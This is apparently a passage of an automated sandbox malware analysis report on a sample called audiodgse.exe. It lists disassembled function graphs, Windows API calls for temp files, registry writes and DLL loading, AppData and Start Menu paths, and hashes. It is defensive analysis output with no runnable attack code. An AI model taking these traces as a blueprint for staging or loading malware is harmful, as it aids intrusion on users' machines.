                                                  control_flow_graph 941 405ba2-405bac 942 405bad-405bd8 GetTickCount GetTempFileNameA 941->942 943 405be7-405be9 942->943 944 405bda-405bdc 942->944 946 405be1-405be4 943->946 944->942 945 405bde 944->945 945->946
                                                  APIs
                                                  • GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\audiodgse.exe" ,00403233,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405BB6
                                                  • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405BD0
                                                  Strings
                                                  • "C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 00405BA2
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BA5
                                                  • nsa, xrefs: 00405BAD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-2808085727
                                                  • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                  • Instruction ID: 2f7af396f84d097035df83fe1d719984909df90e6a6ed76a9758152acb097983
                                                  • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                  • Instruction Fuzzy Hash: B9F082367082086BEB108F5ADC04B9B7BA8DF91750F14803BFA08DA291D6B4B9548B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 947 72be16db-72be1717 call 72be1a98 951 72be171d-72be1721 947->951 952 72be1834-72be1836 947->952 953 72be172a-72be1737 call 72be22f1 951->953 954 72be1723-72be1729 call 72be22af 951->954 959 72be1739-72be173e 953->959 960 72be1767-72be176e 953->960 954->953 963 72be1759-72be175c 959->963 964 72be1740-72be1741 959->964 961 72be178e-72be1792 960->961 962 72be1770-72be178c call 72be24d8 call 72be1559 call 72be1266 GlobalFree 960->962 969 72be17dc-72be17e2 call 72be24d8 961->969 970 72be1794-72be17da call 72be156b call 72be24d8 961->970 986 72be17e3-72be17e7 962->986 963->960 965 72be175e-72be175f call 72be2cc3 963->965 967 72be1749-72be174a call 72be2a38 964->967 968 72be1743-72be1744 964->968 979 72be1764 965->979 982 72be174f 967->982 974 72be1746-72be1747 968->974 975 72be1751-72be1757 call 72be26b2 968->975 969->986 970->986 974->960 974->967 985 72be1766 975->985 979->985 982->979 985->960 990 72be17e9-72be17f7 call 72be249e 986->990 991 72be1824-72be182b 986->991 997 72be180f-72be1816 990->997 998 72be17f9-72be17fc 990->998 991->952 993 72be182d-72be182e GlobalFree 991->993 993->952 997->991 1000 72be1818-72be1823 call 72be14e2 997->1000 998->997 999 72be17fe-72be1806 998->999 999->997 1001 72be1808-72be1809 FreeLibrary 999->1001 1000->991 1001->997
                                                  APIs
                                                    • Part of subcall function 72BE1A98: GlobalFree.KERNEL32(?), ref: 72BE1D09
                                                    • Part of subcall function 72BE1A98: GlobalFree.KERNEL32(?), ref: 72BE1D0E
                                                    • Part of subcall function 72BE1A98: GlobalFree.KERNEL32(?), ref: 72BE1D13
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE1786
                                                  • FreeLibrary.KERNEL32(?), ref: 72BE1809
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE182E
                                                    • Part of subcall function 72BE22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72BE22E0
                                                    • Part of subcall function 72BE26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72BE1757,00000000), ref: 72BE2782
                                                    • Part of subcall function 72BE156B: wsprintfA.USER32 ref: 72BE1599
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: 094b181c46e2c33ce68bef63ae25bc39b74f430039c9364a5265d842e27d1af1
                                                  • Instruction ID: 663884e89916643d0535cd23475f273518eb7fa6e70678257f9555c58c9388a2
                                                  • Opcode Fuzzy Hash: 094b181c46e2c33ce68bef63ae25bc39b74f430039c9364a5265d842e27d1af1
                                                  • Instruction Fuzzy Hash: 914192F1C10204DBDB019F7CC985B9A3BBCFF84714F24A4A9E9179A186EB749845CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1004 401c0a-401c2a call 402b0a * 2 1009 401c36-401c3a 1004->1009 1010 401c2c-401c33 call 402b2c 1004->1010 1012 401c46-401c4c 1009->1012 1013 401c3c-401c43 call 402b2c 1009->1013 1010->1009 1016 401c9a-401cc0 call 402b2c * 2 FindWindowExA 1012->1016 1017 401c4e-401c6a call 402b0a * 2 1012->1017 1013->1012 1027 401cc6 1016->1027 1028 401c8a-401c98 SendMessageA 1017->1028 1029 401c6c-401c88 SendMessageTimeoutA 1017->1029 1030 401cc9-401ccc 1027->1030 1028->1027 1029->1030 1031 401cd2 1030->1031 1032 4029b8-4029c7 1030->1032 1031->1032
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                  • SendMessageA.USER32 ref: 00401C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                  • Instruction ID: 5540d85999f992b2d0d9c3d63f09df6deeece4c427f082cd61f041684b2cd5b6
                                                  • Opcode Fuzzy Hash: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                  • Instruction Fuzzy Hash: 6E216BB1D48208BEEF06AFB4D98AAAD7FB5EB44304F10447EF501B61D1C7B89640DB18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000023,00000011,00000002), ref: 00402488
                                                  • RegSetValueExA.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000), ref: 004024C5
                                                  • RegCloseKey.KERNEL32(?), ref: 004025A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp
                                                  • API String ID: 2655323295-4240112750
                                                  • Opcode ID: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                  • Instruction ID: 8e9ea0cf859de5a6fe7672b5a81e2234dbec8cc7450cb22075f11fbb1059ccd6
                                                  • Opcode Fuzzy Hash: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                  • Instruction Fuzzy Hash: 42119072E00218BEEB01AFA58E49EAE7BB8FB48314F20443BF504B71C1C6B85D419B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095
                                                    • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                    • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                    • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                    • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll), ref: 0040516F
                                                    • Part of subcall function 00405101: SendMessageA.USER32 ref: 00405195
                                                    • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051AF
                                                    • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051BD
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                  • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020B5
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                  • Instruction ID: 97d835e61fc7e0b97890b4be7664cc53dce4a02014942e479506a03d8351e840
                                                  • Opcode Fuzzy Hash: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                  • Instruction Fuzzy Hash: 4521D871A00214BBCF117FA4CE8DAAE79B4AB44319F20413BFA01B62D0C6FD9981D65E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00405A0B: CharNextA.USER32(?), ref: 00405A19
                                                    • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                    • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                    • Part of subcall function 004055C7: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,000000F0), ref: 0040163C
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 00401631
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
                                                  • API String ID: 1892508949-1636881305
                                                  • Opcode ID: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                  • Instruction ID: 3a09c20382928311ba1d31a626229d1df209b5e1cddac7105c79dbf72218ebe6
                                                  • Opcode Fuzzy Hash: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                  • Instruction Fuzzy Hash: B4112731508141EBCB212FB94D4197F36B0EA96325F28453FE4D2B23E2D63D49429A3F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                  • Instruction ID: 897067c620da28adabf34c96f4b8630bfa599ba4fb7ce992f063a5310404d611
                                                  • Opcode Fuzzy Hash: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                  • Instruction Fuzzy Hash: 6D015A7251020AABEF22CF61CC09FDB3BACEF55364F004026FA55A2190D278DA54CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                  • Instruction ID: 81ce818a04e0c3cc04ce684d9a2a9ddfd009c22adec174195ca66df60ea86fc9
                                                  • Opcode Fuzzy Hash: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                  • Instruction Fuzzy Hash: 69A14271E00229DBDF28CFA8C8446ADBBB1FF44305F15842AD916BB281C7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                  • Instruction ID: 08e1f0bd3e012b2653e952fb076f5459688999f8fa16d8000732ef154d800f7e
                                                  • Opcode Fuzzy Hash: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                  • Instruction Fuzzy Hash: 53912370E00229CBEF28CF98C8547ADBBB1FF44305F15816AD956BB281C7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                  • Instruction ID: f9b0e14a80994b8e3cce9b061f2e265d206a391058c15f1564a8a9ac8da356b6
                                                  • Opcode Fuzzy Hash: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                  • Instruction Fuzzy Hash: 80814571D04229DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB281C7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                  • Instruction ID: 64fae73fcf261b5a29c0697abf595a3f572636c651b32177eb72ec05398ad39b
                                                  • Opcode Fuzzy Hash: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                  • Instruction Fuzzy Hash: 39817831D04229DBEF24CFA8D8447ADBBB0FB44305F21816AD856BB2C1C7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                  • Instruction ID: 51e77fe0f08f8d7ba03d7e1561fc41eb13955110d3fdee4e61b85cd17e52ee3e
                                                  • Opcode Fuzzy Hash: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                  • Instruction Fuzzy Hash: C4712371D04229DBEF28CF98C8447ADBBB1FB44305F15806AD806BB281D7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
